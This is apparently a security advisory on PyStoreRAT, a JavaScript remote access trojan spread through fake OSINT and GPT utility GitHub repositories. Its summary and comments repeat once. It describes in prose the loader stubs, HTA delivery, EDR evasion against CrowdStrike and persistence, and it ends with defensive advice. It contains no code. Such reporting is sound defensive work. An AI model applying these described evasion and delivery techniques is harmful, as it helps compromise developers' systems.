Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads
Summary:
PyStoreRAT is an undocumented, multi-stage JavaScript Remote Access Trojan (RAT) primarily delivered through malicious GitHub repositories. These repositories are meticulously crafted to appear legitimate, featuring professional README files, AI-generated graphics, and inflated engagement metrics like stars and forks to deceive developers and OSINT practitioners. The infection begins when a user executes a lightweight Python or JavaScript loader stub embedded in these repositories. This loader silently initiates a connection to a Command and Control (C2) server, which validates the request's User-Agent before delivering an HTA file. This HTA file, executed via mshta[.]exe, contains the primary PyStoreRAT engine, which operates filelessly in memory to avoid static detection.
Once active, PyStoreRAT conducts extensive system profiling, collecting data such as host identity, OS telemetry, and security posture, while specifically checking for administrative and SYSTEM privileges. The RAT is highly modular and utilizes a structured two-stage handshake for C2 communication, requiring a unique session token to authorize task retrieval. It features a robust tasking system (Task IDs 1–11) capable of diverse operations, including downloading and executing EXE and DLL payloads, performing forensic cleanup, executing fileless PowerShell, and propagating via USB worming by replacing legitimate documents with malicious shortcuts. In several observed cases, the RAT has been used to deploy the Rhadamanthys infostealer as a final payload.
Security Officer Comments:
The development of PyStoreRAT indicates a high degree of operational maturity and a focus on bypassing modern defensive stacks. A standout feature is its targeted evasion logic against CrowdStrike Falcon; the malware queries the system for the csfalconservice process and, if detected, attempts to break the process tree by launching subsequent stages through a cmd[.]exe wrapper. To further avoid EDR detection, the authors implemented a custom string manipulation engine for manual deserialization of C2 commands, bypassing the hooks typically placed on standard sinks like eval(). The inclusion of Russian-language artifacts specifically checks for "SYSTEM" privileges in Cyrillic, suggests the threat actors likely originate from Eastern Europe. Its sophisticated persistence mechanism, which disguises itself as a frequent "NVIDIA App SelfUpdate" scheduled task, underscores its intent for long-term access.
Suggested Corrections:
Link(s):
https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
https://www.morphisec.com/blog/pyst...re-campaign-targeting-it-osint-professionals/
PyStoreRAT is an undocumented, multi-stage JavaScript Remote Access Trojan (RAT) primarily delivered through malicious GitHub repositories. These repositories are meticulously crafted to appear legitimate, featuring professional README files, AI-generated graphics, and inflated engagement metrics like stars and forks to deceive developers and OSINT practitioners. The infection begins when a user executes a lightweight Python or JavaScript loader stub embedded in these repositories. This loader silently initiates a connection to a Command and Control (C2) server, which validates the request's User-Agent before delivering an HTA file. This HTA file, executed via mshta[.]exe, contains the primary PyStoreRAT engine, which operates filelessly in memory to avoid static detection.
Once active, PyStoreRAT conducts extensive system profiling, collecting data such as host identity, OS telemetry, and security posture, while specifically checking for administrative and SYSTEM privileges. The RAT is highly modular and utilizes a structured two-stage handshake for C2 communication, requiring a unique session token to authorize task retrieval. It features a robust tasking system (Task IDs 1–11) capable of diverse operations, including downloading and executing EXE and DLL payloads, performing forensic cleanup, executing fileless PowerShell, and propagating via USB worming by replacing legitimate documents with malicious shortcuts. In several observed cases, the RAT has been used to deploy the Rhadamanthys infostealer as a final payload.
Security Officer Comments:
The development of PyStoreRAT indicates a high degree of operational maturity and a focus on bypassing modern defensive stacks. A standout feature is its targeted evasion logic against CrowdStrike Falcon; the malware queries the system for the csfalconservice process and, if detected, attempts to break the process tree by launching subsequent stages through a cmd[.]exe wrapper. To further avoid EDR detection, the authors implemented a custom string manipulation engine for manual deserialization of C2 commands, bypassing the hooks typically placed on standard sinks like eval(). The inclusion of Russian-language artifacts specifically checks for "SYSTEM" privileges in Cyrillic, suggests the threat actors likely originate from Eastern Europe. Its sophisticated persistence mechanism, which disguises itself as a frequent "NVIDIA App SelfUpdate" scheduled task, underscores its intent for long-term access.
Suggested Corrections:
- Restrict Scripting Engines: Organizations should implement policies to block or strictly monitor the execution of mshta[.]exe and wscript[.]exe, as these are the primary vehicles for the RAT's fileless execution.
- GitHub and Open-Source Governance: Security teams should treat third-party GitHub repositories with caution, especially those promoted via social media with high star counts but limited functional history.
- Monitor Scheduled Tasks: Regularly audit system scheduled tasks for unusual entries, particularly those mimicking legitimate software updates that are configured to run at high frequencies like every 10 minutes.
- Endpoint Detection (EDR) Hardening: Configure EDR tools to alert on suspicious parent-child relationships, such as Python or Node.js processes spawning mshta[.]exe or cmd[.]exe wrappers used for process-tree breaking.
- Protect Financial Artifacts: Given the malware's explicit scanning for cryptocurrency wallet files, sensitive financial data should be stored in encrypted volumes or hardware-secured environments.
Link(s):
https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
https://www.morphisec.com/blog/pyst...re-campaign-targeting-it-osint-professionals/